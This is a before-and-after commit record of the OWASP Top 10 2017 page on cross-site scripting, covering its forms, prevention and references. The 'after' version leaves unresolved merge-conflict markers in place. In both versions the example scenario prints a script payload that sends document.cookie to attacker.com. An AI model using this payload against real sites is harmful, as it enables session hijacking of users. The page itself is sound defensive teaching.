2017/en/0xa7-xss.md, before:

# A7:2017 Cross-Site Scripting (XSS)

| Threat agents/Attack vectors | Security Weakness           | Impacts               |
| -- | -- | -- |
| Access Lvl \| Exploitability 3 | Prevalence 3 \| Detectability 3 | Technical 2 \| Business |
| Automated tools can detect and exploit all three forms of XSS, and there are freely available exploitation frameworks. | XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two thirds of all applications. Automated tools can find some XSS problems automatically, particularly in mature technologies such as PHP, J2EE / JSP, and ASP.NET. | The impact of XSS is moderate for reflected and DOM XSS, and severe for stored XSS, with remote code execution on the victim's browser, such as stealing credentials, sessions, or delivering malware to the victim. |

## Am I Vulnerable to XSS?

There are three forms of XSS, usually targeting users' browsers:

* **Reflected XSS**: Your application or API includes unvalidated and  unescaped user input as part of HTML output or there is no content security policy ([CSP](https://www.owasp.org/index.php/Content_Security_Policy)) header. A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim-s browser. Typically the user will need to interact with a link, or some other attacker controlled page, such as a watering hole attack, malicious advertisements, or similar.
* **Stored XSS**: Your app or API stores unsanitized user input that is viewed at a later time by another user or an administrator. Stored XSS is often considered a high or critical risk.
* **DOM XSS**: JavaScript frameworks, single page apps, and APIs that dynamically include attacker-controllable data to a page are vulnerable to DOM XSS. Ideally, you would avoid sending attacker-controllable data to unsafe JavaScript APIs.

Typical XSS attacks include session stealing, account takeover, MFA bypass, DIV replacement or defacement (such as trojan login DIVs), attacks against the user's browser such as malicious software downloads, key logging, and other client side attacks.

## How Do I Prevent This?

Preventing XSS requires separation of untrusted data from active browser content.

* Use safer frameworks that automatically escape for XSS by design, such as in Ruby 3.0 or React JS.
* Escaping untrusted HTTP request data based on the context in the HTML output (body, attribute, JavaScript, CSS, or URL) will resolve Reflected and Stored XSS vulnerabilities. The [OWASP XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet) has details on the required data escaping techniques.
* Applying context sensitive encoding when modifying the browser document on the client side acts against DOM XSS. When this cannot be avoided, similar context sensitive escaping techniques can be applied to browser APIs as described in the [OWASP DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).
* Enabling a [Content Security Policy (CSP)](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP) is a defense in depth mitigating control against XSS, assuming no other vulnerabilities exist that would allow placing malicious code via local file include such as path traversal overwrites, or vulnerable libraries in permitted sources, such as content delivery network or local libraries. 

## Example Attack Scenario

**Scenario 1**: The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:

```
   (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
```

The attacker modifies the 'CC- parameter in the browser to:

```
><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'.
```

This attack causes the victim-s session ID to be sent to the attacker-s website, allowing the attacker to hijack the user-s current session.

Note that attackers can use XSS to defeat any automated CSRF defense the application might employ. 

## References

### OWASP

* [OWASP Proactive Controls - #3 Encode Data](https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Proactive_Controls_2016)
* [OWASP Proactive Controls - #4 Validate Data](https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Proactive_Controls_2016)
* [OWASP Application Security Verification Standard - V5](https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project)
* [OWASP Testing Guide: Testing for Reflected XSS](https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001))
* [OWASP Testing Guide: Testing for Stored XSS](https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002))
* [OWASP Testing Guide: Testing for DOM XSS](https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001))
* [OWASP XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet)
* [OWASP DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet)
* [OWASP XSS Filter Evasion Cheat Sheet](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)

### External

* [CWE-79 Improper neutralization of user supplied input](https://cwe.mitre.org/data/definitions/79.html)
* [PortSwigger: Client-side template injection](https://portswigger.net/knowledgebase/issues/details/00200308_clientsidetemplateinjection)

Commit message:

Undo smart quote check in

2017/en/0xa7-xss.md, after:

# A7:2017 Cross-Site Scripting (XSS)

| Threat agents/Attack vectors | Security Weakness           | Impacts               |
| -- | -- | -- |
| Access Lvl \| Exploitability 3 | Prevalence 3 \| Detectability 3 | Technical 2 \| Business |
| Automated tools can detect and exploit all three forms of XSS, and there are freely available exploitation frameworks. | XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two thirds of all applications. Automated tools can find some XSS problems automatically, particularly in mature technologies such as PHP, J2EE / JSP, and ASP.NET. | The impact of XSS is moderate for reflected and DOM XSS, and severe for stored XSS, with remote code execution on the victim's browser, such as stealing credentials, sessions, or delivering malware to the victim. |

## Am I Vulnerable to XSS?

There are three forms of XSS, usually targeting users' browsers:

<<<<<<< HEAD
* **Reflected XSS**: Your application or API includes unvalidated and  unescaped user input as part of HTML output or there is no content security policy ([CSP](https://www.owasp.org/index.php/Content_Security_Policy)) header. A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim-s browser. Typically the user will need to interact with a link, or some other attacker controlled page, such as a watering hole attack, malicious advertisements, or similar.
=======
* **Reflected XSS**: Your app or API includes unvalidated and  unescaped user input as part of HTML output or there is no content security policy ([CSP](https://www.owasp.org/index.php/Content_Security_Policy)) header. A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim’s browser. Typically the user will need to interact with a link, or some other attacker controlled page, such as a watering hole attack, malicious advertisements, or similar.
>>>>>>> parent of 8d231e1... Remove smart quotes from the markdown version
* **Stored XSS**: Your app or API stores unsanitized user input that is viewed at a later time by another user or an administrator. Stored XSS is often considered a high or critical risk.
* **DOM XSS**: JavaScript frameworks, single page apps, and APIs that dynamically include attacker-controllable data to a page are vulnerable to DOM XSS. Ideally, you would avoid sending attacker-controllable data to unsafe JavaScript APIs.

Typical XSS attacks include session stealing, account takeover, MFA bypass, DIV replacement or defacement (such as trojan login DIVs), attacks against the user's browser such as malicious software downloads, key logging, and other client side attacks.

## How Do I Prevent This?

Preventing XSS requires separation of untrusted data from active browser content.

* Use safer frameworks that automatically escape for XSS by design, such as in Ruby 3.0 or React JS.
* Escaping untrusted HTTP request data based on the context in the HTML output (body, attribute, JavaScript, CSS, or URL) will resolve Reflected and Stored XSS vulnerabilities. The [OWASP XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet) has details on the required data escaping techniques.
* Applying context sensitive encoding when modifying the browser document on the client side acts against DOM XSS. When this cannot be avoided, similar context sensitive escaping techniques can be applied to browser APIs as described in the [OWASP DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).
* Enabling a [Content Security Policy (CSP)](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP) is a defense in depth mitigating control against XSS, assuming no other vulnerabilities exist that would allow placing malicious code via local file include such as path traversal overwrites, or vulnerable libraries in permitted sources, such as content delivery network or local libraries. 

## Example Attack Scenario

**Scenario 1**: The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:

```
   (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
```

The attacker modifies the 'CC’ parameter in the browser to:

```
><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'.
```

This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.

Note that attackers can use XSS to defeat any automated CSRF defense the application might employ. 

## References

### OWASP

* [OWASP Proactive Controls - #3 Encode Data](https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Proactive_Controls_2016)
* [OWASP Proactive Controls - #4 Validate Data](https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Proactive_Controls_2016)
* [OWASP Application Security Verification Standard - V5](https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project)
* [OWASP Testing Guide: Testing for Reflected XSS](https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001))
* [OWASP Testing Guide: Testing for Stored XSS](https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002))
* [OWASP Testing Guide: Testing for DOM XSS](https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001))
* [OWASP XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet)
* [OWASP DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet)
* [OWASP XSS Filter Evasion Cheat Sheet](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)

### External

* [CWE-79 Improper neutralization of user supplied input](https://cwe.mitre.org/data/definitions/79.html)
* [PortSwigger: Client-side template injection](https://portswigger.net/knowledgebase/issues/details/00200308_clientsidetemplateinjection)
